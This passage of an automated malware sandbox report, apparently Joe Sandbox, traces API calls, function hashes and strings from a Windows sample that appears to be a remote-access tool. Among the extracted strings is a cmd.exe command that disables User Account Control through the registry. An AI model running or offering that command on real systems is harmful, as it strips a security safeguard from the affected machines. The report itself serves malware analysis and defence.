                                                  • Opcode ID: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                                  • Instruction ID: 8d34d3ffa9a8a5ca7629c839d325bdddc3ef58a145117f7ac1d0225592351e3a
                                                  • Opcode Fuzzy Hash: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                                  • Instruction Fuzzy Hash: 8EF0A435101B006BF611772A6C06B6F26599BD3B69F36042FFD18962D2EF6DCC42816D
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                  • String ID:
                                                  • API String ID: 221034970-0
                                                  • Opcode ID: f94ae9c5674c9adfc346e263051d54d626d5e40d867c234dda8e9c50f9d09011
                                                  • Instruction ID: 443f58cffa4f299642b313368f914f767bd977a6fac550f0ec2f38f013616b5a
                                                  • Opcode Fuzzy Hash: f94ae9c5674c9adfc346e263051d54d626d5e40d867c234dda8e9c50f9d09011
                                                  • Instruction Fuzzy Hash: E4F0F631541318BBD7116F259C49DFF3B6CDB45B62F000026FE0992192EB68DD4595F9
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                                                  • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                  • String ID:
                                                  • API String ID: 221034970-0
                                                  • Opcode ID: 497ef82d1474d54709910eeaca97da118b40a23fe9dfeecc14ddd5be20b51566
                                                  • Instruction ID: 80b71cf000cc834045a6d48b23744411b71cc7e49355023a2f572df053a73ec4
                                                  • Opcode Fuzzy Hash: 497ef82d1474d54709910eeaca97da118b40a23fe9dfeecc14ddd5be20b51566
                                                  • Instruction Fuzzy Hash: 73F0C231501218ABD611AF65AC4AEFF3B6CDB45B62F00002AFE0992192EB38CD4595E9
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                                                  • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                  • String ID:
                                                  • API String ID: 221034970-0
                                                  • Opcode ID: cf41fc214d4f8651c842d323f4a9434d7ee1c2a315675ff23975f89e6a089888
                                                  • Instruction ID: 4c72e2560426042a93d841201029be6eaa37955ba2c7d49e75f16ae618c5df44
                                                  • Opcode Fuzzy Hash: cf41fc214d4f8651c842d323f4a9434d7ee1c2a315675ff23975f89e6a089888
                                                  • Instruction Fuzzy Hash: 85F0F631501228BBD7116F25AC49DFF3B6CDB45B62F00002AFE0992192EB38CD46A6F9
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CountEventTick
                                                  • String ID: !D@$,aF$NG
                                                  • API String ID: 180926312-2771706352
                                                  • Opcode ID: b0e29a965a4cc51e31eb951a195b658058a1f748b9b607b896c300db774f5fc5
                                                  • Instruction ID: 3ac9408315e1e6036cedb879f74fb80cbd33a95067926c5a5f9e9f7d680cff10
                                                  • Opcode Fuzzy Hash: b0e29a965a4cc51e31eb951a195b658058a1f748b9b607b896c300db774f5fc5
                                                  • Instruction Fuzzy Hash: 3E51A5315082019AC724FB32D852AFF73A5AF94304F50483FF54A671E2EF3C5945C68A
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID: @^E
                                                  • API String ID: 269201875-2908066071
                                                  • Opcode ID: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                                  • Instruction ID: 6f8591e81a910498abf0b0e408487d1c0faf04506bf4bd3dd9e850377c22d226
                                                  • Opcode Fuzzy Hash: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                                  • Instruction Fuzzy Hash: 34413931B00104AAEB207B7A9C4666F3AB5DF45735F570A1FFD28C7293DA7C481D426A
                                                  APIs
                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\FPPhfkcDCh.exe,00000104), ref: 00443515
                                                  • _free.LIBCMT ref: 004435E0
                                                  • _free.LIBCMT ref: 004435EA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$FileModuleName
                                                  • String ID: C:\Users\user\Desktop\FPPhfkcDCh.exe$%k
                                                  • API String ID: 2506810119-1135508340
                                                  • Opcode ID: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                  • Instruction ID: e5efe6401a3e5f1db0e1141fbbc5a3d1caea7301f6195c2e8eaff0a3f5655f7e
                                                  • Opcode Fuzzy Hash: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                  • Instruction Fuzzy Hash: D63193B1A00254BFEB21DF9A998199EBBF8EB84B15F10406BF40597311D6B88F41CB99
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: X,l
                                                  • API String ID: 0-3772506311
                                                  • Opcode ID: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                                  • Instruction ID: 437de9af4247593539f95cdbb70b1dc5411192884b5f12beac7b10196549b189
                                                  • Opcode Fuzzy Hash: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                                  • Instruction Fuzzy Hash: CB01ADB26096527ABA202E796CC5E27634CDB42BBA335037BF821512E3DF68DE054169
                                                  APIs
                                                  • RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                                  • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                                  • GetLastError.KERNEL32 ref: 0041D611
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ClassCreateErrorLastRegisterWindow
                                                  • String ID: 0$MsgWindowClass
                                                  • API String ID: 2877667751-2410386613
                                                  • Opcode ID: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                  • Instruction ID: e808ecd18ef19f47bd472c0c6462b34ef8490c58390ad3ae495a6aa035ed2a4b
                                                  • Opcode Fuzzy Hash: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                  • Instruction Fuzzy Hash: 1F0125B1D00219ABDB00DFA5EC849EFBBBCEA08355F40453AF914A6241EB7589058AA4
                                                  APIs
                                                  • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
                                                  • CloseHandle.KERNEL32(?), ref: 004077E5
                                                  • CloseHandle.KERNEL32(?), ref: 004077EA
                                                  Strings
                                                  • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
                                                  • C:\Windows\System32\cmd.exe, xrefs: 004077D1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseHandle$CreateProcess
                                                  • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                  • API String ID: 2922976086-4183131282
                                                  • Opcode ID: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                  • Instruction ID: 1887ccd63cb29ce90d3c4a9dee080bc6fb52b3336ad705aa4023eed0db3a7680
                                                  • Opcode Fuzzy Hash: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                  • Instruction Fuzzy Hash: 04F09672D4029C76CB20ABD7AC0EEDF7F3CEBC5B11F00051AF904A2045DA745400CAB5
                                                  APIs
                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 004433FA
                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044340D
                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 00443430
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                  • Instruction ID: d7bd46dfab834bb5d48edea7818df211002af85bf4a2e706b61bd78119be3437
                                                  • Opcode Fuzzy Hash: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                  • Instruction Fuzzy Hash: 4EF04931900208FBDB159F65DC45B9EBF74EF04753F0040A5F805A2251DB758E40CA99
                                                  APIs
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405140
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                  • String ID: KeepAlive | Disabled
                                                  • API String ID: 2993684571-305739064
                                                  • Opcode ID: 79b17cb61ca097f2dd87540d91e49b40a86234966918d688794a6c742f2a43ed
                                                  • Instruction ID: dc79248355977efa3495ea8e96f68553e1f2867eb32bbe7dc6984d352a193ca4
                                                  • Opcode Fuzzy Hash: 79b17cb61ca097f2dd87540d91e49b40a86234966918d688794a6c742f2a43ed
                                                  • Instruction Fuzzy Hash: 5DF06D71904711BBDB203B758D0AAAB7E95AB06315F0009BEF982916E2D6798C408F9A
                                                  APIs
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
                                                  • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
                                                  • Sleep.KERNEL32(00002710), ref: 0041AE98
                                                  • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: PlaySound$HandleLocalModuleSleepTime
                                                  • String ID: Alarm triggered
                                                  • API String ID: 614609389-2816303416
                                                  • Opcode ID: 7392df8db2022c5dabbdd0a7ddbeb5ff2cdfd3fc416767bfd221d1b9e2b6ff7c
                                                  • Instruction ID: 264e31dd7f8ae4a58c3cd97330858728e5483d82e525179ed11d996d756d41c5
                                                  • Opcode Fuzzy Hash: 7392df8db2022c5dabbdd0a7ddbeb5ff2cdfd3fc416767bfd221d1b9e2b6ff7c
                                                  • Instruction Fuzzy Hash: 3EE0D826A40220779A10337B6D0FD6F3D29CAC3B2570100BFFA05660C2DD540C01C6FB
                                                  APIs
                                                  • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
                                                  • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE00
                                                  • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CE7E), ref: 0041CE0D
                                                  • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE20
                                                  Strings
                                                  • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                  • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                  • API String ID: 3024135584-2418719853
                                                  • Opcode ID: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                  • Instruction ID: 3099d3b49c49d1df3d44327ff87017ee7d1b0803ff7cdb2815dc6b7c28d9377e
                                                  • Opcode Fuzzy Hash: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                  • Instruction Fuzzy Hash: B6E04872504315E7E31027B5EC4DCAB7B7CE745613B100266FA16915D39A749C41C6B5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                                  • Instruction ID: 15e211ccade7fc2a5debfa8ad78d9bfa955d5b29a73147504924d067d3782226
                                                  • Opcode Fuzzy Hash: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                                  • Instruction Fuzzy Hash: 2771D4319012569BEB21CF55C884AFFBB75EF55310F19412BE815672A0DB78CCC1CBA8
                                                  APIs
                                                    • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                    • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
                                                  • CloseHandle.KERNEL32(00000000), ref: 0040FB40
                                                    • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,00475338), ref: 0041C08B
                                                    • Part of subcall function 0041C076: IsWow64Process.KERNEL32(00000000,?,?,?,00475338), ref: 0041C096
                                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                  • String ID:
                                                  • API String ID: 2180151492-0
                                                  • Opcode ID: b612a60f51ba30386d7e6c27c988ec9eea2298f46b4f956bf04d12ed4463d939
                                                  • Instruction ID: d02cab962e177bd28921c4f9a71df23b762ba7d31cecf8da060328e0f3db66c6
                                                  • Opcode Fuzzy Hash: b612a60f51ba30386d7e6c27c988ec9eea2298f46b4f956bf04d12ed4463d939
                                                  • Instruction Fuzzy Hash: 5F4136311083419BC325F722DC51AEFB3A5AF94305F50493EF58A921E2EF385A49C65A
                                                  APIs
                                                  Memory Dump Source
